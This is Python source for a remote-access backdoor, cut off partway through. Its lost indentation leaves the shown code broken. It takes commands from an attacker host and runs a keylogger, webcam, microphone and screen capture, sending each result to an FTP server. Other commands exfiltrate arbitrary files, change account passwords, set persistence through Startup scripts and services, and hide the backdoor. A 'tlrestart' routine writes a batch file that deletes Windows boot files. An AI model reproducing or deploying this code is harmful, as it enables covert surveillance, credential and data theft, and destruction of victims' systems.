from Crypto.Cipher import XOR
import base64
import thread
from pynput.keyboard import Key, Listener
import logging
import urllib
import threading
import numpy as np
import netifaces
import pyttsx3
import ctypes
import glob
import pyaudio
import wave
if 'Linux' not in platform.platform():
import win32con
from PIL import ImageGrab
from PIL import Image
import pyautogui
import imutils
elif 'Windows' not in platform.platform():
import pyautogui
import imutils
global log_dirrec
global log_file
global cmd_key
def keylogger_module(cmd_key,log_dirrec,log_file):
global key_active
if cmd_key =='startkey':
key_active = True
if key_active ==True:
logging.basicConfig(filename=(log_dirrec + log_file), level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(key)
with Listener(on_press=on_press) as listener:
listener.join()
elif cmd_key =='stopkey':
key_active = False
while True:
break
elif cmd_key =='restartkey':
key_active = True
if key_active ==True:
logging.basicConfig(filename=(log_dirrec + log_file), level=logging.DEBUG, format='%(asctime)s: %(message)s')
def on_press(key):
logging.info(key)
with Listener(on_press=on_press) as listener:
listener.join()
def server2popen(server_socket, p):
while True:
data = server_socket.recv(65556)
if len(data) > 0:
p.stdin.write(data)
else:
p.stdin.write(data)
def popen2socket(server_socket, p):
while True:
server_socket.sendall(p.stdout.read(1))
def sys_required():
if sys.version[0] =='3':
sys.exit('[*] Please Run With Python2')
global cmdkeyvideo
global key_video
global host_alive
global temp_pers
host_alive = []
temp_pers_vbs = '''
Dim nativsystem
Set nativshellsystem = WScript.CreateObject("WScript.shell")
Do while True:
nativshellsystem.Run "payl_bin", 0, true
WScript.Sleep(10000)
loop
'''
temp_pers_bat = '''
@echo off
nativsystem
:service_nativ
timeout 10 > NUL
start payl_bin
goto:service_nativ
'''
def try_ping(host):
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
req_ping = subprocess.Popen('ping -n 1 %s' % (host), shell=True, startupinfo=info, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_req = req_ping.stdout.read() + req_ping.stderr.read()
lenght_out = len(out_req)
if lenght_out ==246:
#print('[*] Not Found !')
pass
elif lenght_out>246:
#print('yess')
get_hostname = socket.gethostbyaddr(host)
host_alive.append('IP : %s Hostname : %s\n' % (host,get_hostname[0]))
elif 'Windows' not in platform.platform():
req_ping = os.system('ping -c 1 -b %s > /dev/null ' % (host))
if req_ping ==0:
get_hostname = socket.gethostbyaddr(host)
host_alive.append('IP : %s Hostname : %s\n' % (host,get_hostname[0]))
else:
pass
except:
pass
def start_scanner_network():
gtw = netifaces.gateways()
interface = gtw['default'][2][1]
gtw_ip = gtw['default'][2][0]
scanner_gtw_ip = gtw_ip[:10]
try:
i = 0
while i<256:
thread.start_new_thread(try_ping,(scanner_gtw_ip+str(i),))
time.sleep(0.1)
i = i+1
except Exception as error_start_scanner:
print(error_start_scanner)
def main_config_server(LHOST,LPORT,FTPHOST,FTPPORT,FTPUSER,FTPPASSWD,log_dir_key,log_file_key):
get_ip = requests.get('https://ifconfig.me/ip')
ip = get_ip.text
socket_local = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
socket_local.connect(('8.8.8.8', 80))
localip = socket_local.getsockname()[0]
buffer = 1024
global server_socket
server_socket=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
try:
server_socket.connect((LHOST,LPORT))
except socket.error:
pass
server_socket.send('\n')
while True:
try:
data = server_socket.recv(buffer)
if data.startswith('quit')==True:
break
elif data.startswith('cd')==True:
change_dirrectory = data
split = shlex.split(change_dirrectory)
try:
if len(split) ==2:
check_dir = os.path.exists(split[1])
if check_dir ==True:
os.chdir(split[1])
current_path = os.getcwd()
server_socket.sendall('[*] Dirrectory Change : %s' % (current_path))
else:
server_socket.sendall('[*] Path Not Found !')
else:
server_socket.send('[!] Please Enter Dirrectory')
except Exception as error_change_dirrectory:
server_socket.sendall(error_change_dirrectory)
elif data.startswith('keylogger_start')==True:
try:
server_socket.send('[*] Keylogger Started !')
thread.start_new_thread(keylogger_module,('startkey',log_dir_key,log_file_key))
except Exception as error_start_keylogger:
server_socket.send(error_start_keylogger)
elif data.startswith('keylogger_stop')==True:
try:
server_socket.send('[*] Keylogger Stoped !')
thread.start_new_thread(keylogger_module,('stopkey',log_dir_key,log_file_key))
except Exception as error_stop_keylogger:
server_socket.send(error_stop_keylogger)
elif data.startswith('keylogger_dump')==True:
try:
check_log_file = os.path.exists(log_dir_key+log_file_key)
if check_log_file ==True:
file=open(log_dir_key+log_file_key,'rb')
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
connect.storbinary('STOR '+log_file_key, file)
file.close()
connect.quit()
server_socket.sendall('[*] %s Downloaded ! Save In FTP Server' % (log_file_key))
else:
server_socket.send('[*] %s%s not Found !' % (log_dir_key,log_file_key))
except Exception as error_keydump:
server_socket.send(error_keydump)
elif data.startswith('keylogger_restart')==True:
try:
server_socket.send('[*] Keylogger Restarted !')
thread.start_new_thread(keylogger_module,('restartkey',log_dir_key,log_file_key))
except Exception as error_keylogger_restart:
server_socket.send(error_keylogger_restart)
elif data.startswith('ftpdownload')==True:
file_download = data
split = shlex.split(file_download)
try:
if len(split)==2:
check_file_exists = os.path.exists(split[1])
if check_file_exists ==True:
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = split[1]
file = open(filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
server_socket.send('[*] %s Downloaded And Save At FTP Server' % (filename))
else:
server_socket.send('[*] %s Not Found !' % (split[1]))
else:
server_socket.send('[*] Please Enter File For ftpdownload <file>')
except Exception as error_ftpdownload:
server_socket.sendall(error_ftpdownload)
elif data.startswith('webcamsnap')==True:
try:
t = datetime.now().strftime('%H_%M')
webcam=cv2.VideoCapture(0)
check, frame = webcam.read()
time.sleep(1)
name_picture = 'webcam_%s.png' % (t)
cv2.imwrite(name_picture, frame)
webcam.release()
cv2.destroyAllWindows()
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = name_picture
current_path=os.getcwd()
file=open(current_path+'/'+filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
os.remove(filename)
server_socket.sendall('[*] Webcamsnap Save as %s ' % (name_picture))
except Exception as error_webcam_snap:
server_socket.sendall(error_webcam_snap)
pass
elif data.startswith('getuid')==True:
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
uid = subprocess.Popen('echo %Username%', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_uid = uid.stdout.read() + uid.stderr.read()
server_socket.send('[*] UID => %s ' % (out_uid))
elif 'Windows' not in platform.platform():
whoami = subprocess.Popen('whoami', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_whoami = whoami.stdout.read() + whoami.stderr.read()
server_socket.send('[*] UID => %s' % (out_whoami))
except:
server_socket.send('[*] Error Getuid')
elif data.startswith('record_mic')==True:
split = shlex.split(data)
if len(split)==2:
seconds = split[1]
int_seconds = int(seconds)
try:
t = datetime.now().strftime('%H_%M')
filename = 'output_%s.wav' % (t)
CHUNK = 1024
FORMAT = pyaudio.paInt16
CHANNELS = 2
RATE = 44100
RECORD_SECONDS = int_seconds
p = pyaudio.PyAudio()
stream = p.open(format=FORMAT,channels=CHANNELS,rate=RATE,input=True,frames_per_buffer=CHUNK)
frames = []
for i in range(0, int(RATE / CHUNK * RECORD_SECONDS)):
data = stream.read(CHUNK)
frames.append(data)
stream.stop_stream()
stream.close()
p.terminate()
wf = wave.open(filename, 'wb')
wf.setnchannels(CHANNELS)
wf.setsampwidth(p.get_sample_size(FORMAT))
wf.setframerate(RATE)
wf.writeframes(b''.join(frames))
wf.close()
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
current_path=os.getcwd()
file=open(current_path+'/'+filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
os.remove(filename)
server_socket.sendall('[*] Recording Save as %s' % (filename))
except:
server_socket.send('[*] Error Recording !')
else:
server_socket.send('[*] Error : record_mic <seconds>\nexample : record_mic 10\n')
elif data.startswith('cwpasswd')==True:
recv_cwpasswd=data[9:]
split = shlex.split(recv_cwpasswd)
user_change=split[0]
password_new=split[1]
try:
os.system('net user %s %s' % (user_change,password_new))
server_socket.send('[*] Password Change For %s Users New Password Is %s\n' % (user_change,password_new))
except Exception as error_cwpasswd:
server_socket.send(error_cwpasswd)
elif data.startswith('netuser')==True:
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
cmd_net_user = subprocess.Popen(['net','user'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_cmd_net_user = cmd_net_user.stdout.read() + cmd_net_user.stderr.read()
server_socket.send(out_cmd_net_user)
except Exception as error_net_user:
server_socket.send(error_net_user)
elif data.startswith('tkill')==True:
proc=data[6:]
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('taskkill /F /IM %s' % (proc), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
server_socket.send('[*] Task Killed ! %s\n' % (proc))
elif 'Windows' not in platform.platform():
os.system('pkill -f %s' % (proc))
server_socket.send('[*] Task Killed ! %s\n' % (proc))
else:
server_socket.send('[*] Please Enter Processus To kill')
except Exception as error_tkill:
server_socket.send(error_tkill)
elif data.startswith('process')==True:
processus=data
split = shlex.split(processus)
try:
if 'Linux' not in platform.platform():
os.system('start %s &' % (split[1]))
server_socket.send('[*] Task Started : %s !' % (split[1]))
elif 'Windows' not in platform.platform():
os.system('exec %s &' % (split[1]))
server_socket.send('[*] Task Started : %s !' % (split[1]))
except Exception as error_start_process:
server_socket.send(error_start_process)
elif data.startswith('msgbox')==True:
message=data[7:]
try:
f=open('msg.vbs','w')
f.write('msgbox "%s"' % (message))
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s=subprocess.Popen('start msg.vbs &', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
time.sleep(1)
os.system('del msg.vbs /Q')
server_socket.send('[*] Message Sent : %s\n' % (message))
except Exception as error_msgbox_sent:
server_socket.sendall(error_msgbox_sent)
elif data.startswith('getpid')==True:
try:
pid = os.getpid()
server_socket.send('[*] PID : %s' % (pid))
except Exception as error_get_pid:
server_socket.send(error_get_pid)
elif data.startswith('speak')==True:
message=data[6:]
try:
engine = pyttsx3.init()
voices = engine.getProperty('voices')
engine.setProperty('voice', voices[0].id)
engine.say(message)
engine.runAndWait()
server_socket.send('[*] Voice Message Speak : %s' % (message))
except Exception as error_speak_message:
server_socket.sendall(error_speak_message)
elif data.startswith('meslp')==True:
message_loop=data[6:]
try:
f=open('msgloop.vbs','w')
f.write('Do\n')
f.write('msgbox "%s"\n' % (message_loop))
f.write('loop\n')
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('start msgloop.vbs &', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
time.sleep(1)
os.system('del msgloop.vbs /Q')
server_socket.send('[*] Message Loop Sent : %s' % (message_loop))
except Exception as error_message_loop:
server_socket.send(error_message_loop)
elif data.startswith('resettime')==True:
try:
os.system('time 12:00')
server_socket.send('[*] Time Reset !')
except Exception as error_resettime:
server_socket.send(error_resettime)
elif data.startswith('ftpupload')==True:
time.sleep(1)
filename=data
split = shlex.split(filename)
try:
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = split[1]
file=open(filename,'wb')
connect.retrbinary('RETR '+filename, file.write)
file.close()
connect.quit()
server_socket.sendall('[*] %s Uploaded !' % (filename))
except Exception as error_ftpupload:
server_socket.sendall(error_ftpupload)
elif data.startswith('persistence')==True:
split = shlex.split(data)
if len(split) ==1:
server_socket.send('---===[Persistence Help]===---\nmethod :\n1 <bat/vbs> <payload_path> | Make Persistence with .vbs or .bat and restart payload with 10 seconds interval\n2 <payload_path> | copy payload on startup\n3 <service_name> <payload_path>\n')
elif split[1] =="1":
if len(split) ==4:
if split[2] =="bat":
f=open('nativsystem.bat','w')
f.write(temp_pers_bat)
f.close()
f=open('nativsystem.bat','r')
content = f.read()
f.close()
replace_nativ = content.replace('payl_bin',split[3])
f=open('nativsystem.bat','w')
f.write(replace_nativ)
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
var_username = subprocess.Popen('echo %username%', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_var_username = var_username.stdout.read()
split_slash_var_username = out_var_username.split('\r\n')
os.system('move nativsystem.bat "C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' % (split_slash_var_username[0]))
server_socket.send('[*] Persistence Created and save as C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\nativsystem.bat' % (split_slash_var_username[0]))
elif split[2] =="vbs":
f=open('nativsystem.vbs','w')
f.write(temp_pers_vbs)
f.close()
f=open('nativsystem.vbs','r')
content = f.read()
f.close()
replace_nativ = content.replace('payl_bin',split[3])
f=open('nativsystem.vbs','w')
f.write(replace_nativ)
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
var_username = subprocess.Popen('echo %UserName%', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_var_username = var_username.stdout.read()
split_slash_var_username = out_var_username.split('\r\n')
os.system('move nativsystem.vbs "C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"' % (split_slash_var_username[0]))
server_socket.send('[*] Persistence Created and save as C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\\nativsystem.vbs' % (split_slash_var_username[0]))
else:
server_socket.send('[*] Format Script error : %s' % (split[2]))
else:
server_socket.send('[*] Error : persistence 1 => arguments required !\n')
elif split[1] =="2":
if len(split) ==3:
try:
var_username = subprocess.Popen('echo %UserName%', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_var_username = var_username.stdout.read()
split_slash_var_username = out_var_username.split('\r\n')
os.system('copy %s C:\Users\%s\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' % (split[2],split_slash_var_username[0]))
except:
server_socket.send('[*] Error : persistence 2 => arguments required !\n')
else:
server_socket.send('[*] Format Script error : %s' % (split[2]))
elif split[1] =="3":
if len(split)==4:
try:
service_name = split[2]
binpath = split[3]
cmd_pers = subprocess.Popen('sc create %s binpath="%s" start=auto' % (service_name,binpath), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_pers = cmd_pers.stdout.read() + cmd_pers.stderr.read()
server_socket.sendall(out_cmd_pers)
except:
server_socket.send('[*] Error : persistence 3 => arguments required ! \n')
else:
server_socket.send('[*] Error : Persistence !\n')
else:
server_socket.send('[*] Error : Persistence !\n')
elif data.startswith('move')==True:
file_move=data[5:]
file_old_new = shlex.split(file_move)
old_file = file_old_new[0]
new_file = file_old_new[1]
try:
if len(file_old_new)==2:
shutil.move(old_file,new_file)
check_new_file = os.path.exists(new_file)
if check_new_file ==True:
server_socket.sendall('[*] %s Moved At %s' % (old_file,new_file))
else:
server_socket.sendall('[*] %s Not Moved !' % (old_file))
else:
server_socket.send('[*] Please Select File !')
except Exception as error_move_cmd:
server_socket.sendall(error_move_cmd)
elif data.startswith('xorencode')==True:
filename=data
split = shlex.split(filename)
try:
if len(split)==2:
key = 'dxvistxr'
cipher = XOR.new(key)
check_filename = os.path.exists(split[1])
if check_filename ==True:
f=open(split[1], 'rb')
content = f.read()
f.close()
encode = base64.b64encode(cipher.encrypt(content))
f=open(split[1], 'wb')
f.write(encode)
f.close()
server_socket.sendall('[*] %s Encoded With Xor !' % (split[1]))
else:
server_socket.send('[*] %s File Not Found !' % (split[1]))
else:
server_socket.send('[*] Please Select File !')
except Exception as error_xor:
server_socket.sendall(error_xor)
elif data.startswith('ping')==True:
ip = data[5:]
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
ping_cmd_win = subprocess.Popen('ping -n 1 %s' % (ip), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_ping_cmd = ping_cmd_win.stdout.read() + ping_cmd_win.stderr.read()
server_socket.sendall(out_ping_cmd)
elif 'Windows' not in platform.platform():
ping_cmd = subprocess.Popen('ping -c 1 %s' % (ip), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_ping_cmd = ping_cmd.stdout.read() + ping_cmd.stderr.read()
server_socket.sendall(out_ping_cmd)
except Exception as error_ping_command:
server_socket.sendall(error_ping_command)
elif data.startswith('copy')==True:
file_copy=data[5:]
file_old_new = shlex.split(file_copy)
old_place = file_old_new[0]
new_place = file_old_new[1]
try:
if len(file_old_new)==2:
shutil.copy(old_place,new_place)
check_new_place = os.path.exists(new_place)
if check_new_place ==True:
server_socket.sendall('[*] %s Copied at %s !' % (old_place,new_place))
else:
server_socket.sendall('[*] %s Not Copied !' % (old_place))
else:
server_socket.send('[*] Please Enter File')
except Exception as error_copy_file:
server_socket.sendall(error_copy_file)
elif data.startswith('banner')==True:
server_socket.send('\n')
elif data.startswith('screenshot')==True:
try:
if 'Linux' not in platform.platform():
t = datetime.now().strftime('%H_%M')
name = 'screenshot_%s.png' % (t)
im = pyautogui.screenshot(name)
#im.save(name)
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = name
current_path=os.getcwd()
file=open(current_path+'/'+filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
os.remove(filename)
server_socket.send('[*] Screenshot Save as %s ' % (name))
elif 'Windows' not in platform.platform():
t = datetime.now().strftime('%H:%M:%S')
name = 'screenshot_%s.png' % (t)
im = pyautogui.screenshot(name)
connect = FTP(FTPHOST)
connect.login(FTPUSER,FTPPASSWD)
filename = name
current_path=os.getcwd()
file=open(current_path+'/'+filename,'rb')
connect.storbinary('STOR '+filename, file)
file.close()
connect.quit()
os.remove(filename)
server_socket.send('[*] Screenshot Save as %s ' % (name))
except Exception as error_screenshot:
server_socket.send(error_screenshot)
elif data.startswith('shutdown')==True:
try:
if 'Linux' not in platform.platform():
os.system('shutdown -S -t 00')
elif 'Windows' not in platform.platform():
os.system('shutdown now')
except Exception as error_pc_shutdown:
server_socket.sendall(error_pc_shutdown)
elif data.startswith('reboot')==True:
try:
if 'Linux' not in platform.platform():
os.system('shutdown -R -t 00')
elif 'Windows' not in platform.platform():
os.system('reboot')
except Exception as error_reboot:
server_socket.sendall(error_reboot)
elif data.startswith('del')==True:
delete_file = data
split = shlex.split(delete_file)
try:
if len(split)==2:
check_delete_file = os.path.exists(split[1])
if check_delete_file ==True:
os.remove(split[1])
server_socket.sendall('[*] %s Removed ! ' % (split[1]))
else:
server_socket.sendall('[*] %s Not Found !' % (split[1]))
else:
server_socket.send('[*] Please Select File !')
except:
server_socket.sendall('[*] File Not Removed !')
elif data.startswith('rmpt')==True:
delete_path = data
split = shlex.split(delete_path)
try:
if len(split)==2:
check_delete_path = os.path.exists(split[1])
if check_delete_path==True:
os.rmdir(split[1])
server_socket.sendall('[*] %s Removed ! ' % (split[1]))
else:
server_socket.sendall('[*] %s Not Found !' % (split[1]))
else:
server_socket.send('[*] Please Enter Folder')
except:
server_socket.sendall('[*] File Not Removed !')
elif data.startswith('getgtw')==True:
try:
gtws = netifaces.gateways()
get_gateway = gtws['default'][netifaces.AF_INET][0].encode('utf-8')
server_socket.send('[*] Gateways : %s' % (get_gateway))
except Exception as error_get_gateway:
server_socket.send(error_get_gateway)
elif data.startswith('mkpa')==True:
create_dir = data
split = shlex.split(create_dir)
try:
if len(split)==2:
check_if_exists = os.path.exists(split[1])
if check_if_exists ==True:
server_socket.sendall('[*] %s Already Exists ! ' % (split[1]))
else:
os.mkdir(split[1])
server_socket.sendall('[*] %s Successfully Created !' % (split[1]))
else:
server_socket.send('[*] Please Enter Folder Name')
except Exception as error_mkdir:
server_socket.sendall(error_mkdir)
elif data.startswith('ifconfig')==True:
try:
if 'Linux' not in platform.platform():
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
cmd_ifconfig = subprocess.Popen(['ipconfig'],shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
out_cmd = cmd_ifconfig.stdout.read() + cmd_ifconfig.stderr.read()
server_socket.sendall(out_cmd)
elif 'Windows' not in platform.platform():
cmd_ifconfig = subprocess.Popen(['ifconfig'],shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd = cmd_ifconfig.stdout.read() + cmd_ifconfig.stderr.read()
server_socket.sendall(out_cmd)
except Exception as error_ifconfig_info:
server_socket.sendall(error_ifconfig_info)
elif data.startswith('openurl')==True:
link=data
split = shlex.split(link)
try:
webbrowser.open_new(split[1])
server_socket.send('[*] Link Opened => %s' % (split[1]))
except Exception as error_start_webbrowser:
server_socket.send(error_start_webbrowser)
elif data.startswith('change_wallpaper')==True:
split = shlex.split(data)
try:
url = split[1]
name = 'wlp.jpg'
urllib.urlretrieve(url, name)
path_current = os.getcwd()
path = path_current+'\\wlp.jpg'
changed = win32con.SPIF_UPDATEINIFILE | win32con.SPIF_SENDCHANGE
ctypes.windll.user32.SystemParametersInfoA(win32con.SPI_SETDESKWALLPAPER,0,path.encode(),changed)
time.sleep(2)
os.remove('wlp.jpg')
server_socket.send('[*] Wallpaper Changed To => Wallpaper !')
except Exception as error_cwlp_background:
server_socket.send(error_cwlp_background)
elif data.startswith('webdownload')==True:
split = shlex.split(data)
try:
url = split[1]
name = split[2]
urllib.urlretrieve(url,name)
server_socket.send('[*] %s Downloaded From The Web !' % (name))
except:
server_socket.send('[*] WebDownload error !')
elif data.startswith('opendiskloop')==True:
try:
if 'Linux' not in platform.platform():
f=open('opendisk.vbs','w')
f.write('Do\n')
f.write('Set oWMP = CreateObject("WMPlayer.OCX.7" )\n')
f.write('Set colCDROMs = oWMP.cdromCollection\n')
f.write('colCDROMs.Item(d).Eject\n')
f.write('colCDROMs.Item(d).Eject\n')
f.write('Loop\n')
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('start opendisk.vbs &', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
time.sleep(0.5)
s2 = subprocess.Popen('del opendisk.vbs /Q', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
server_socket.send('[*] Open Disk Loop Started !')
elif 'Windows' not in platform.platform():
server_socket.send('[*] Windows Victim Required ! : Your Target is Linux or Other O.S')
except Exception as error_send_opendisk_loop:
server_socket.send(error_send_opendisk_loop)
elif data.startswith('odisk')==True:
try:
if 'Linux' not in platform.platform():
f=open('opendisk.vbs','w')
f.write('Set oWMP = CreateObject("WMPlayer.OCX.7" )\n')
f.write('Set colCDROMs = oWMP.cdromCollection\n')
f.write('colCDROMs.Item(d).Eject\n')
f.write('colCDROMs.Item(d).Eject\n')
f.close()
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
s = subprocess.Popen('start opendisk.vbs &', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
time.sleep(0.5)
s2 = subprocess.Popen('del opendisk.vbs /Q', shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE, startupinfo=info)
server_socket.send('[*] Open Disk And Close Disk !')
elif 'Windows' not in platform.platform():
server_socket.send('[*] Windows Required !')
except Exception as error_sent_odisk:
server_socket.send(error_sent_odisk)
elif data.startswith('tlrestart')==True:
try:
if 'Linux' not in platform.platform():
f=open('tlrestart.bat','w')
f.write('attrib -r -s -h C:\\autoexec.bat')
f.write('del C:\\autoexec.bat\n')
f.write('attrib -r -s -h C:\\boot.ini\n')
f.write('del C:\\boot.ini\n')
f.write('attrib -r -s -h C:\\ntldr\n')
f.write('del C:\\ntldr')
f.write('attrib -r -s -h C:\\Windows\\win.ini\n')
f.write('del C:\\Windows\\win.ini\n')
f.write('shutdown /r /t 2\n')
f.close()
#os.system('start tlrestart.bat')
time.sleep(0.3)
os.system('del tlrestart.bat')
server_socket.send('[*] The Last Restart Started !!! Rebooting Machine in few seconds')
elif 'Windows' not in platform.platform():
server_socket.send('[*] Windows Required For This Command !')
except Exception as error_tlrestart:
server_socket.send(error_tlrestart)
elif data.startswith('hide_backdoor')==True:
try:
if 'Linux' not in platform.platform():
os.system('attrib +h %0')
server_socket.send('[*] Backdoor Hidden !!')
elif 'Windows' not in platform.platform():
server_socket.send('[*] Windows Required !!')
except Exception as error_hide_backdoor:
server_socket.send(error_hide_backdoor)
elif data.startswith('cat')==True:
file_cat = data
split = shlex.split(file_cat)
try:
if len(split)==2:
check_file = os.path.exists(split[1])
if check_file ==True:
f=open(split[1],'rb')
content = f.read()
f.close()
server_socket.sendall(content)
else:
server_socket.sendall('[*] File Not Found : %s' % (split[1]))
else:
server_socket.send('[*] Please Select File !')
except Exception as error_cat:
server_socket.sendall(error_cat)
elif data.startswith('whoami')==True:
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
if 'Windows' not in platform.platform():
cmd_whoami = subprocess.Popen(['whoami'], shell=True, stderr=subprocess.PIPE, stdout=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_whoami = cmd_whoami.stderr.read() + cmd_whoami.stdout.read()
server_socket.sendall(out_cmd_whoami)
elif 'Linux' not in platform.platform():
cmd_user = subprocess.Popen(['whoami'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_user = cmd_user.stdout.read() + cmd_user.stderr.read()
server_socket.sendall(out_cmd_user)
except Exception as error_whoami:
server_socket.sendall(error_whoami)
elif data.startswith('rname')==True:
rename_file = data[6:]
split = shlex.split(rename_file)
old = split[0]
new = split[1]
try:
if len(split)==2:
check_rename_exists = os.path.exists(old)
if check_rename_exists ==True:
os.rename(old,new)
server_socket.sendall('[*] %s Renamed to %s !' % (old,new))
else:
server_socket.sendall('[*] %s Not Found !' % (old))
else:
server_socket.send('[*] Please Select Old And New File Renamed !')
except Exception as error_rename:
server_socket.sendall(error_rename)
elif data.startswith('sysinfo')==True:
try:
SW_HIDE = 0
info = subprocess.STARTUPINFO()
info.dwFlags = subprocess.STARTF_USESHOWWINDOW
info.wShowWindow = SW_HIDE
platform_os = platform.system()
platform_version = platform.version()
platform_architecture = platform.architecture()[0]
platform_hostname = platform.node()
if 'Linux' not in platform.platform():
cmd_whoami_info = subprocess.Popen(['whoami'], shell=True, startupinfo=info, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_whinfo = cmd_whoami_info.stdout.read() + cmd_whoami_info.stderr.read()
server_socket.sendall('[*] OS : %s\n[*] Version : %s\n[*] Architecture : %s\n[*] Hostname : %s\n[*] Public IP : %s\n[*] Local IP : %s\n[*] User Session : %s\n\n' % (platform_os,platform_version,platform_architecture,platform_hostname,ip,localip,out_cmd_whinfo))
elif 'Windows' not in platform.platform():
cmd_whoami_info = subprocess.Popen(['whoami'], shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE, stdin=subprocess.PIPE)
out_cmd_whinfo = cmd_whoami_info.stdout.read() + cmd_whoami_info.stderr.read()
server_socket.sendall('[*] OS : %s\n[*] Version : %s\n[*] Architecture : %s\n[*] Hostname : %s\n[*] Public IP : %s\n[*] Local IP : %s\n[*] User Session : %s\n\n' % (platform_os,platform_version,platform_architecture,platform_hostname,ip,localip,out_cmd_whinfo))
except Exception as error_sysinfo:
server_socket.sendall(error_sysinfo)
elif data.startswith('pwd')==True:
try:
path = os.getcwd()
server_socket.sendall('Current Path : %s' % (path))
except Exception as error_pwd:
server_socket.sendall(error_pwd)
elif data.startswith('b64encode')==True:
filename_b64encode=data
split = shlex.split(filename_b64encode)
try:
if len(split)==2:
check_fb64 = os.path.exists(split[1])
if check_fb64 ==True:
f=open(split[1],'rb')
content = f.read()
f.close()
encode = base64.b64encode(content)
content_replace = content.replace(content,encode)
f=open(split[1],'wb')
